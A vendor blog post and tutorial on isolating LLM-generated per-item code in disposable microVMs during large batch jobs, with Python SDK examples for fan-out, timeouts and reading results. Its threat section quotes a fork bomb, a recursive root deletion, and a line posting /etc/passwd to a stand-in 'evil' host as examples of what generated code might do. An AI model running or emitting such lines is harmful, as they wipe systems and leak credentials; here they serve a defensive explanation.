Sandboxing LLM Batch Post-Processing at Scale

Ajay Kumar · 9 min read

You run an LLM over 50,000 inputs. Support tickets, PDFs, product rows, scraped pages — pick your dataset. For most of them the model doesn't just answer; it emits code. "Parse this invoice into JSON." "Normalize this address with a regex." "Run this transform over the row." "Here's a Python snippet that computes the answer." Now you have a second problem stacked on top of the first: something has to *execute* those per-item snippets, and that something is model-generated code you have never seen and cannot review before it runs. The clean answer is a pool of ephemeral microVMs — one sandbox per item (or per batch), exec the generated code, read the result back out, destroy the VM — and the only reason that's affordable at 50,000 items is that a PandaStack create is a snapshot restore, not a cold boot.

This is a use-case guide, not a generic interpreter tutorial. We'll build the fan-out loop with the Python SDK, talk through the throughput and economics that make per-item VMs actually work, cover how to bound a runaway item with ttl_seconds, how to read structured results back out, and — the decision people get wrong — when one shared sandbox per batch is enough versus one VM per item. I'm Ajay; I built PandaStack, and I'll be honest about where the trade-offs sit.

Why you can't run per-item generated code on your worker host

The shortcut is to take the model's snippet, `exec()` it in your batch worker, and move on to the next row. At item #1 this works. At item #4,197 the model — prompted by a weird input, a jailbreak buried in a scraped page, or just its own bad day — emits `while True: os.fork()`, or `shutil.rmtree('/')`, or a quiet `requests.post('http://evil/', data=open('/etc/passwd').read())`. Your worker process is now a fork bomb, a wiped disk, or an exfiltration client. And because a batch worker is long-lived and shared, that one poisoned item takes down every item queued behind it on the same box.

The failure modes compound in a batch specifically because the volume is the whole point:

  • You cannot review 50,000 snippets. The entire value of the pipeline is that a human isn't in the loop. "We'll sanity-check the code first" doesn't survive contact with the batch size.
  • One bad item shouldn't fail the batch. On a shared worker, an infinite loop or an OOM from item N stalls or kills items N+1..50000. You want the blast radius to be exactly one item.
  • State leaks between items. A snippet that writes to /tmp, mutates a global, or leaves a process running poisons the next item's run on the same worker — the flaky-CI problem, but per row.
  • A subprocess or container isn't a real boundary. A container still shares the host kernel, so a fork bomb or a kernel exploit from item N can reach the host. You want a hardware boundary you can throw away.

A microVM is a different category of answer. On PandaStack every sandbox boots its own guest kernel under Firecracker — the same VMM behind AWS Lambda and Fargate — so the blast radius of arbitrary per-item code is one disposable VM with its own memory, filesystem, and network namespace. Item #4,197's fork bomb hits the walls of a 2 GiB microVM you're about to delete, the item is marked failed, and item #4,198 starts in a pristine VM that never saw it.

The rule that governs the whole design: never execute model-emitted code in the process that's orchestrating the batch. The orchestrator holds your credentials, your queue, and every other item's data. The generated code runs in the VM; the orchestrator only ever creates VMs, hands them code, and reads results back. Cross that line and one hostile item owns your pipeline.

The fan-out pattern: a pool of ephemeral microVMs

The shape is a bounded worker pool over your items. Each worker, for each item it pulls, does five things and nothing else:

  1. Create a sandbox from a template — ideally a snapshot with your libraries already baked in, so there's no per-item install.
  2. Get the item in: write the input data and the model's generated code into the VM's filesystem.
  3. Exec the generated code with a timeout. It returns stdout, stderr, and an exit code.
  4. Read the result back out: a structured JSON file off the filesystem, or stdout if the output is small.
  5. Destroy the sandbox. Nothing survives — that's the point. The next item gets a fresh VM.

The concurrency of the pool is a dial you set: N workers means at most N live VMs at once, which is how you cap memory pressure on the fleet while still chewing through the batch in parallel. Because each VM is disposable, you never write cleanup code between items — a corrupted VM is deleted, not scrubbed. The only thing that escapes an item's VM is the result you deliberately read out.

A per-item fan-out loop in Python

Here's the whole pattern: a bounded pool of workers, one throwaway sandbox per item, the model's generated code exec'd against the item's data, a structured result read back off the filesystem, and a guaranteed teardown. Set PANDASTACK_API_KEY in the environment first. `generate_code(item)` is your LLM call — whatever produces the per-item snippet — and is deliberately left as the boring part.

import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from pandastack import PandaStack

ps = PandaStack()  # reads PANDASTACK_API_KEY, base url https://api.pandastack.ai

POOL_SIZE = 32          # at most 32 live microVMs at once -> caps fleet memory
ITEM_BUDGET_SECONDS = 20


def process_item(item: dict) -> dict:
    """One item = one throwaway microVM. Runs the model's generated code and
    reads a structured result back out. Never touches the orchestrator host."""
    sb = None
    try:
        # Inside the try so a failed LLM call or a failed create becomes a
        # failed item instead of an exception that escapes into run_batch.
        code = generate_code(item)  # your LLM call: emits a Python snippet for this item

        # 1. Fresh, hardware-isolated VM. ttl_seconds is a hard self-destruct backstop
        #    so a hung or malicious item can't outlive its budget even if we crash.
        sb = ps.sandboxes.create(
            template="code-interpreter",         # scientific stack baked into the snapshot
            ttl_seconds=ITEM_BUDGET_SECONDS + 10,
            metadata={"item_id": item["id"], "kind": "batch-postprocess"},
        )

        # 2. Item data + generated code go INTO the VM. The snippet writes its
        #    answer to /work/result.json so we read structured output, not scraped text.
        sb.filesystem.write("/work/input.json", json.dumps(item).encode())
        sb.filesystem.write("/work/run.py", code.encode())

        # 3. Exec with a timeout. This is the ONLY place untrusted code runs.
        r = sb.exec("cd /work && python3 run.py", timeout_seconds=ITEM_BUDGET_SECONDS)
        if r.exit_code != 0:
            return {"id": item["id"], "ok": False, "error": r.stderr[-500:]}

        # 4. Read the structured result back out of the VM.
        out = sb.filesystem.read("/work/result.json")
        return {"id": item["id"], "ok": True, "result": json.loads(out)}
    except Exception as e:
        # A fork bomb / OOM / timeout lands here. One item fails; the batch does not.
        return {"id": item["id"], "ok": False, "error": str(e)}
    finally:
        # 5. Always destroy. #4,197's `while True: os.fork()` dies with this VM.
        if sb is not None:
            try:
                sb.delete()
            except Exception:
                pass  # delete failed; the ttl_seconds backstop still reaps the VM


def run_batch(items: list[dict]) -> list[dict]:
    results = []
    with ThreadPoolExecutor(max_workers=POOL_SIZE) as pool:
        futures = {pool.submit(process_item, it): it for it in items}
        for fut in as_completed(futures):
            results.append(fut.result())
    return results


# results = run_batch(load_items())  # 50,000 items, 32 at a time, each in its own VM
# ok = sum(1 for r in results if r["ok"]); print(f"{ok}/{len(results)} succeeded")

Notice what the orchestrator never does: it never runs the model's code, never trusts an exit code to be zero, and never assumes the result file exists. Every item is wrapped in create/try/finally so a failure is a data point (`ok: False`), not a batch-killer. Swap the ThreadPoolExecutor for your queue worker or a Celery/RQ task and the shape is identical — the unit of work is "one item, one VM, read result, delete."

Why a VM per item is affordable at 50,000 items

The instinct is that a VM per item is absurdly expensive, because VMs are supposed to be heavy. That instinct is calibrated on platforms that cold-boot a full VM, which takes seconds, and that keep a warm pool of idle capacity you pay for around the clock. PandaStack breaks both assumptions.

  • Create is a snapshot restore, not a cold boot: a create runs at ~179ms p50 (~203ms p99), because the heavy lifting is a ~49ms snapshot-restore step against a baked template, not a multi-second cold boot. Only the very first spawn of a fresh template pays the ~3s cold boot to bake the snapshot; every item after that restores.
  • No warm pool to pay for: there are no idle VMs kept hot waiting for work. A VM exists for the ~seconds an item runs, then it's gone. Between batches your microVM cost is effectively zero — you pay for the work, not for standby capacity.
  • Copy-on-write memory and disk: restoring the Nth identical VM doesn't copy gigabytes. Guest memory is MAP_PRIVATE (pages copy only on write) and the rootfs is an XFS reflink clone, so 32 concurrent code-interpreter VMs share the baked pages until each one writes.
  • Plenty of address space: an agent pre-allocates 16,384 /30 subnets, so a per-item-VM pool has enormous headroom before networking is the bottleneck. The real ceiling is host memory and CPU, which your POOL_SIZE dial controls directly.

Put it together: at ~179ms per create with no warm-pool tax, the fixed overhead of "give this item its own hardware-isolated VM" is a fraction of a second of create time plus a few seconds of guest memory. The dominant cost of the batch stays what it should be, the LLM inference and the actual per-item work, not VM provisioning. That's the whole reason per-item isolation is a default here rather than a luxury.
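To put rough numbers on that, here is a back-of-envelope sketch. The 179ms create and the pool of 32 come from the figures above; the 5 seconds of per-item work is an assumption picked for illustration, not a measurement. The model is idealized: every worker stays busy, and LLM latency, delete time, and stragglers are ignored.

```python
def batch_estimate(items: int, pool_size: int, create_s: float, work_s: float) -> dict:
    """Idealized wall-clock estimate for a per-item-VM batch."""
    per_item_s = create_s + work_s
    wall_clock_s = items * per_item_s / pool_size
    return {
        "wall_clock_hours": wall_clock_s / 3600,
        # Fraction of each item's lifetime spent creating the VM.
        "create_share": create_s / per_item_s,
        # Wall-clock minutes the whole batch spends on creates.
        "create_minutes": items * create_s / pool_size / 60,
    }


# work_s=5.0 is an assumed per-item runtime; substitute your own.
est = batch_estimate(items=50_000, pool_size=32, create_s=0.179, work_s=5.0)
print(f"{est['wall_clock_hours']:.2f} h wall clock")
print(f"{est['create_share']:.1%} of each item is VM create")
print(f"{est['create_minutes']:.1f} min of the batch is VM create")
```

Under those assumptions the batch takes a bit over two hours, of which under five minutes is VM creation. The shorter your per-item work, the larger the create share becomes, which is the case the shared-VM option later in this post is for.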

The key insight: strong isolation is normally a trade-off against throughput. Real VMs are slow to spin up, so you pool and share them, which weakens the isolation you wanted in the first place. Snapshot-restore plus no-warm-pool removes the trade-off. You get a fresh, hardware-isolated kernel per item in sub-second time, so "a clean VM for every row" costs you almost nothing.

Bounding each item so one row can't run forever

In a batch, the failure you must plan for is the item that never finishes: an accidental infinite loop, a scan over more data than you expected, a snippet that waits on a network call that never returns. Two timeout layers keep a single item from stalling the whole run, and two further limits cap what a bad item or a bad batch can consume or leak.

  • exec timeout_seconds is your inner circuit breaker. When the generated code exceeds it, the exec returns and the item is marked failed — the loop moves on. Set it to a realistic per-item budget; model-written code loops more than you'd like.
  • ttl_seconds on create is the outer backstop. The VM self-destructs after its TTL no matter what — even if your orchestrator process crashes mid-item and never calls delete(). Set it a little above the exec budget so the timeout normally fires first and the TTL only catches orphans.
  • Cap concurrency with POOL_SIZE. This is your memory governor: N live VMs is the most memory the batch can pin at once. It also naturally rate-limits how fast a pathological batch can spawn VMs.
  • Lock down egress if exfiltration is in your threat model. A microVM still has a network namespace; restrict outbound at the network layer so a hostile snippet can't POST your data out, rather than trusting the code not to.

The combination is what lets you walk away from a 50,000-item batch overnight. The worst an individual item can do is burn its own time budget inside its own VM and get marked failed — it cannot hang the batch, and thanks to ttl_seconds it cannot leak a live VM even if your driver dies.
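One way to keep the two timeouts from drifting apart is to derive the TTL from the exec budget in a single place. This is a minimal sketch: `ItemBudget` and `margin_seconds` are illustrative names, not part of the PandaStack SDK, and the 10-second margin mirrors the `ITEM_BUDGET_SECONDS + 10` used in the loop above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ItemBudget:
    """Timeouts for one item. A hypothetical helper, not an SDK type."""

    exec_seconds: int          # inner breaker: pass as exec timeout_seconds
    margin_seconds: int = 10   # headroom for file writes and the result read

    def __post_init__(self) -> None:
        if self.exec_seconds <= 0 or self.margin_seconds <= 0:
            raise ValueError("exec_seconds and margin_seconds must be positive")

    @property
    def ttl_seconds(self) -> int:
        # Outer backstop: strictly above the exec budget, so the exec timeout
        # normally fires first and the TTL only catches orphaned VMs.
        return self.exec_seconds + self.margin_seconds


budget = ItemBudget(exec_seconds=20)
print(budget.exec_seconds, budget.ttl_seconds)
```

Passing `budget.ttl_seconds` to create and `budget.exec_seconds` to exec means nobody can raise the exec budget later and silently end up with a TTL that fires first.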

Reading structured results back out

Parsing free-form stdout across 50,000 items is a losing game — one stray print statement and your regex is wrong for 4% of the batch. Have the generated code write a structured file to a known path and read that back instead, exactly like the loop above did with /work/result.json.

# What you prompt the model to emit for each item: read input, do the work,
# write a JSON result. stdout is for debugging; result.json is the contract.
generated_snippet = '''
import json
with open("/work/input.json") as f:
    item = json.load(f)

# ... the model's per-item logic: parse, transform, extract, compute ...
answer = {"invoice_total": 4213.55, "currency": "USD", "line_items": 7}

with open("/work/result.json", "w") as f:
    json.dump(answer, f)
print("ok")  # goes to stdout; the real result is the file
'''

# In the worker: confirm exit_code == 0 (non-zero usually means the file was
# never written), then read the file. Never trust that result.json exists.
r = sb.exec("cd /work && python3 run.py", timeout_seconds=20)
if r.exit_code == 0:
    result = json.loads(sb.filesystem.read("/work/result.json"))
else:
    result = {"error": r.stderr[-500:]}  # feed back to the model to self-correct
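The bytes that come back were written by untrusted code, so it can be worth validating them before the orchestrator treats them as a result. The following is a sketch under assumptions: `parse_result`, `MAX_RESULT_BYTES`, and the required-keys check are hypothetical helpers of my own, and the 1 MB cap is an arbitrary placeholder.

```python
import json

MAX_RESULT_BYTES = 1_000_000  # assumed cap; tune to your largest legitimate result


def parse_result(raw: bytes, required_keys: set[str]) -> dict:
    """Validate bytes read from the VM before trusting them as a result."""
    if len(raw) > MAX_RESULT_BYTES:
        return {"ok": False, "error": f"result too large: {len(raw)} bytes"}
    try:
        data = json.loads(raw)
    except (ValueError, RecursionError) as e:
        # ValueError covers both malformed JSON and undecodable bytes.
        return {"ok": False, "error": f"invalid JSON: {e}"}
    if not isinstance(data, dict):
        return {"ok": False, "error": "result is not a JSON object"}
    missing = required_keys - set(data)
    if missing:
        return {"ok": False, "error": f"missing keys: {sorted(missing)}"}
    return {"ok": True, "result": data}


print(parse_result(b'{"invoice_total": 4213.55, "currency": "USD"}',
                   {"invoice_total", "currency"}))
print(parse_result(b"[1, 2, 3]", {"invoice_total"}))
```

A validation failure is handled the same way as a non-zero exit code: the item is marked failed and the error string can go back to the model.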

`filesystem.read` returns raw bytes, so the same pattern covers any artifact an item produces (a cleaned CSV, a rendered chart PNG, a parquet slice), not just JSON. And handing `stderr` back to the model on failure is most of what makes these pipelines feel robust: a snippet that hits `KeyError: 'Region'` gets the error, fixes the casing, and you retry that single item without disturbing the batch.
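The self-correction retry can be sketched as a small loop around the per-item worker. The signatures here are assumptions for illustration: `generate(item, previous_error)` stands in for your LLM call and `run_in_sandbox(item, code)` for the create/exec/read/delete cycle. The two `fake_*` functions exist only so the sketch runs without a model or a sandbox.

```python
from typing import Callable, Optional

Generate = Callable[[dict, Optional[str]], str]   # hypothetical LLM call
RunInSandbox = Callable[[dict, str], dict]        # hypothetical per-item VM run


def process_with_retries(item: dict, generate: Generate,
                         run_in_sandbox: RunInSandbox, max_attempts: int = 3) -> dict:
    """Retry one item, feeding the previous error into the next prompt."""
    error: Optional[str] = None
    for attempt in range(1, max_attempts + 1):
        code = generate(item, error)           # error is None on the first attempt
        outcome = run_in_sandbox(item, code)   # each attempt gets a fresh VM
        if outcome["ok"]:
            return {**outcome, "attempts": attempt}
        error = outcome["error"]
    return {"id": item["id"], "ok": False, "error": error, "attempts": max_attempts}


# Stand-ins: the "model" gets the key casing wrong until it sees an error.
def fake_generate(item: dict, previous_error: Optional[str]) -> str:
    key = "region" if previous_error else "Region"
    return f"item[{key!r}]"


def fake_run(item: dict, code: str) -> dict:
    if "Region" in code:
        return {"id": item["id"], "ok": False, "error": "KeyError: 'Region'"}
    return {"id": item["id"], "ok": True, "result": item["region"]}


print(process_with_retries({"id": 1, "region": "EMEA"}, fake_generate, fake_run))
```

Capping `max_attempts` matters as much as the retry itself: each attempt costs another LLM call and another VM, and a snippet that fails three times is usually telling you something about the input.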

One VM per item vs one shared VM per batch

A fresh VM per item is the safe default, but it isn't always the right granularity. The dial is: how much do you trust the code, and how independent are the items? Three configurations cover almost everything.

  • One sandbox per item — Isolation: maximum; a hostile or crashing item can't touch any other. Overhead: one ~179ms create + delete per item. Best when: the per-item code is fully untrusted (jailbreaks, scraped inputs), items must not see each other's data (multi-tenant), or a crash must never cascade. This is the default for anything with a real threat model.
  • One shared sandbox per batch (or per chunk) — Isolation: items share a VM, so they can leak state to each other, but the batch is still fully isolated from your host and from other batches. Overhead: amortized — one create for the whole chunk, then N execs. Best when: all items in a batch belong to the same trust domain (your own data, your own trusted transform), throughput matters more than per-item isolation, and the code is idempotent enough that state bleed doesn't corrupt results. Reap the VM between chunks to bound drift.
  • Your own worker thread, no sandbox — Isolation: none; code runs on your host. Overhead: zero. Best when: the code is NOT model-generated — it's a fixed transform you wrote and trust. Don't spin up a VM to run code you already control; that's just latency for no security gain.

A useful middle path is per-batch VMs with hard resets: create one sandbox per chunk of, say, 100 same-tenant items, exec each item's code against it, and delete-and-recreate the VM every chunk so state can't accumulate across the whole run. You get most of the isolation of per-item with a fraction of the create overhead. The moment items cross trust or tenant boundaries, though, go back to one VM per item — the ~179ms create is cheap enough that there's rarely a good reason to share a VM across untrusted inputs.
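The per-chunk variant can be sketched as follows. `create_sandbox` and `run_item` are hypothetical callables standing in for the SDK create call and for the write/exec/read steps, and the `Sandbox` protocol lists only the one method this sketch needs.

```python
from typing import Callable, Iterator, Protocol


class Sandbox(Protocol):
    """Minimal surface used here; a stand-in, not the SDK's own type."""

    def delete(self) -> None: ...


def chunked(items: list[dict], size: int) -> Iterator[list[dict]]:
    """Yield consecutive slices of at most `size` items."""
    for start in range(0, len(items), size):
        yield items[start:start + size]


def run_chunked(items: list[dict],
                create_sandbox: Callable[[], Sandbox],
                run_item: Callable[[Sandbox, dict], dict],
                chunk_size: int = 100) -> list[dict]:
    """One VM per chunk of same-tenant items, deleted and recreated per chunk."""
    results = []
    for chunk in chunked(items, chunk_size):
        sb = create_sandbox()
        try:
            for item in chunk:
                try:
                    results.append(run_item(sb, item))
                except Exception as e:
                    # The item fails, but the rest of the chunk still runs.
                    results.append({"id": item["id"], "ok": False, "error": str(e)})
        finally:
            sb.delete()  # hard reset: state can't outlive the chunk
    return results
```

The trade-off is visible in the inner loop: if one item wedges the shared VM, every later item in that chunk is likely to fail with it. The chunk size is therefore also the blast radius, which is why this shape only suits items from a single trust domain.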

Audit story for free: with one VM per item, "what could have touched this item's data" has a short answer: that VM, and it no longer exists. With a shared batch VM you at least know the blast radius is that batch's trust domain and nothing else on your fleet. Either way the orchestrator host stays clean because it never ran the code.

Honest limits and when not to reach for this

Per-item VMs cost memory while they're live, so the POOL_SIZE dial matters — size it to your fleet's RAM, not to your ambitions. If your items are tiny and the code is trivial and trusted, the create overhead can dominate the actual work; that's exactly the case for a shared batch VM or no sandbox at all. And if an item's dataset is genuinely huge, a single VM's RAM is the ceiling — push the heavy scan into DuckDB over a file (out-of-core) or pre-aggregate upstream rather than loading everything into one guest.
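A conservative way to pick POOL_SIZE is to assume every live VM eventually dirties all of its guest memory. In this sketch the 2 GiB guest size is the figure used earlier in the post, while the 128 GiB host and the 4 GiB reserve are assumed numbers for illustration. It also treats the fleet as a single host for simplicity.

```python
def max_pool_size(host_ram_gib: float, vm_ram_gib: float,
                  reserved_gib: float = 4.0) -> int:
    """Worst-case bound on concurrent VMs: no credit for copy-on-write sharing."""
    if vm_ram_gib <= 0:
        raise ValueError("vm_ram_gib must be positive")
    usable_gib = host_ram_gib - reserved_gib   # leave room for the host itself
    return max(0, int(usable_gib // vm_ram_gib))


# Assumed host: 128 GiB of RAM with 4 GiB held back for the host OS.
print(max_pool_size(host_ram_gib=128, vm_ram_gib=2))
```

Because restored VMs share baked pages until they write, real usage is often lower than this bound. Starting from the worst case and raising the pool size while watching host memory is safer than starting high and discovering the ceiling mid-batch.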

But for the shape this post is about — an LLM emitting code you can't review, over inputs you don't fully trust, at a volume no human can babysit — a pool of ephemeral microVMs is the cleanest answer I know of. One disposable VM per item (or per trusted chunk), a hard time budget, a structured result read back out, and item #4,197's fork bomb becomes a single `ok: False` in your results array instead of a 3 a.m. page. That's the whole trick: make strong isolation cheap enough that you stop rationing it.

Frequently asked questions

How do I safely execute the code an LLM generates for each item in a batch?

Run each item's generated code in its own ephemeral microVM, never in your batch worker process. With PandaStack, create a sandbox on the code-interpreter template with a ttl_seconds backstop, write the item's data and the model's snippet into the VM's filesystem, exec the snippet with a timeout, then read a structured result file back out with filesystem.read and delete the VM. A bounded thread/queue pool caps how many VMs run at once. Because each item gets its own Firecracker guest kernel, a malicious or runaway snippet is contained to one disposable VM rather than your host or the rest of the batch.

Isn't creating a microVM for every one of thousands of items too expensive?

Not on a snapshot-restore platform. PandaStack creates a sandbox in about 179ms at p50 (~203ms p99) by restoring a baked template snapshot rather than cold-booting, and there's no warm pool of idle VMs to pay for — a VM exists only while an item runs, then it's gone. Memory is copy-on-write (MAP_PRIVATE) and the rootfs is an XFS reflink clone, so concurrent identical VMs share baked pages until they write. The fixed overhead per item is a fraction of a second and a few seconds of memory, so the dominant cost stays your LLM inference and the actual per-item work.

How do I stop one item's generated code from running forever or hanging the whole batch?

Use two layers. Pass timeout_seconds to exec as the inner circuit breaker — when the generated code exceeds it, the exec returns and you mark that item failed and move on. Set ttl_seconds on create as the outer backstop so the VM self-destructs even if your orchestrator crashes and never calls delete(). Cap concurrency with your pool size to govern total memory, and wrap each item in try/finally so a fork bomb, OOM, or timeout becomes a single failed item rather than a batch-killer. If exfiltration is a concern, also restrict the guest's network egress.

When is one shared sandbox per batch enough instead of one VM per item?

Share a sandbox across a batch (or chunk) when all the items belong to the same trust domain — your own data, a transform you wrote, no cross-tenant mixing — and throughput matters more than per-item isolation. You amortize one create over many execs. Go back to one VM per item when the code is fully untrusted (jailbreaks, scraped inputs), items must not see each other's data, or a crash must never cascade. A middle path is per-chunk VMs that you delete and recreate every N items so state can't accumulate. Since a create is only ~179ms, there's rarely a good reason to share a VM across untrusted inputs.

How do I read structured results back out of each item's sandbox?

Prompt the model to write its answer to a known path like /work/result.json instead of relying on stdout, then in the worker confirm exec returned exit_code 0 (non-zero usually means the file was never written) and call sandbox.filesystem.read('/work/result.json'), which returns raw bytes you json.loads. The same pattern covers any artifact — a cleaned CSV, a chart PNG, a parquet slice. On failure, hand stderr back to the model so it can self-correct and retry just that single item without disturbing the rest of the batch.

Written by Ajay Kumar, Founder, PandaStack.